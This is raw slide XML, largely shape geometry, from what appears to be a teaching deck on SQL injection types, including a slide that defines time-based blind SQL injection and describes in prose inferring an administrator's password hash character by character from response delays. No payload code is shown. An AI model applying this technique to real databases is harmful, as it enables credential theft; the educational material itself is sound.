                    <a:pt x="2954811" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="64719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="158079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3112896" y="790380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3104837" y="840344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3082394" y="883738"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3048172" y="917957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3004776" y="940397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954811" y="948456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158079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500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8595896" y="9049222"/>
            <a:ext cx="190944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20">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean</a:t>
            </a:r>
            <a:endParaRPr sz="44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651163" y="8958669"/>
            <a:ext cx="3113405" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3113405" h="948690">
                <a:moveTo>
                  <a:pt x="0" y="158079"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="30500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="158079"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3112896" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3104837" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3082394" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3048172" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3004776" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2954811" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158079" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30500" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158079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2625554" y="9049222"/>
            <a:ext cx="116459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60">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e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675006" y="7978793"/>
            <a:ext cx="11245850" cy="981075"/>
            <a:chOff x="1675006" y="7978793"/>
            <a:chExt cx="11245850" cy="981075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1706408" y="8010206"/>
              <a:ext cx="1868805" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1868804" h="0">
                  <a:moveTo>
                    <a:pt x="1868551" y="0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706419" y="8010206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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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427300" y="8011201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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="7999044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w="0" h="948690">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="948456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550316" y="8025964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90" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="884608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0434928" y="8025964"/>
              <a:ext cx="2454910" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2454909" h="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2454401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2889346" y="7999044"/>
              <a:ext cx="0" cy="960119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="960120">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="959628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534435" y="8014263"/>
              <a:ext cx="1892935" cy="20320"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1892935" h="20320">
                  <a:moveTo>
                    <a:pt x="1892864" y="20266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951500"/>
            <a:ext cx="8262620" cy="11099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100" spc="-285"/>
              <a:t>Time-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-275"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-740"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="7100" spc="-270"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr sz="71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44752" y="2931714"/>
            <a:ext cx="17015460" cy="514413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89255" marR="240029" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Time-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>blind </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-505">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQLi </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>technique </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>relies </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-229">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pausing </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specified </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>amount </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>returning </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>results,  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-125">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>indicating </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-350">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-265">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>successful </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-130">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-365">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>execution.</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1070"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-295">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-245">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Query:</a:t>
            </a:r>
            <a:endParaRPr sz="4600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="766445" marR="5080">
              <a:lnSpc>
                <a:spcPts val="4270"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="950"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>If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25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first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150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>character</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of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100">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>administrator’s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220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>hashed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-200">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘a’,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30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>wait</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> 10  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>seconds.</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1520190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>takes </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>seconds </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>letter </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘a’</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1520190">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="390"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>doesn’t </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>take </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>10 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-220">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>seconds </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-315">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>→ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-25">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>first </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>letter </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-175">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-320">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3300" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>‘a’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990536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9"/>
              <a:t>Types </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-305"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-275"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1115"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-409"/>
              <a:t>Injection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800600" y="2959312"/>
            <a:ext cx="3268979" cy="948690"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3268979" h="948689">
                <a:moveTo>
                  <a:pt x="0" y="158078"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8058" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="8058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="30499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="64719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="108113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="158078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3268657" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3260598" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3238157" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3203938" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3160544" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3110580" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="158078" y="948456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108113" y="940397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64719" y="917957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30499" y="883738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8058" y="840345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="790381"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="158078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13761" y="3050662"/>
            <a:ext cx="304101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670">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-280">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Injection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04356" y="3858260"/>
            <a:ext cx="9062085" cy="3157855"/>
            <a:chOff x="1404356" y="3858260"/>
            <a:chExt cx="9062085" cy="3157855"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10434928" y="3889693"/>
              <a:ext cx="0" cy="1099185"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="0" h="1099185">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1098569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74961" y="5009816"/>
              <a:ext cx="6860540" cy="0"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6860540" h="0">
                  <a:moveTo>
                    <a:pt x="6859966" y="0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35788" y="6035784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4260823" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="158078" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8058" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30499" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64718" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108113" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158078" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260823" y="948452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="940393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="917953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="883733"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="840339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="790373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4418902" y="158078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410843" y="108113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4388402" y="64718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354183" y="30499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310788" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426082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35788" y="6035784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499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8" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260836" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310801" y="8058"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4354194" y="30500"/>
                  </a:lnTo>
                  <a:lnTo>
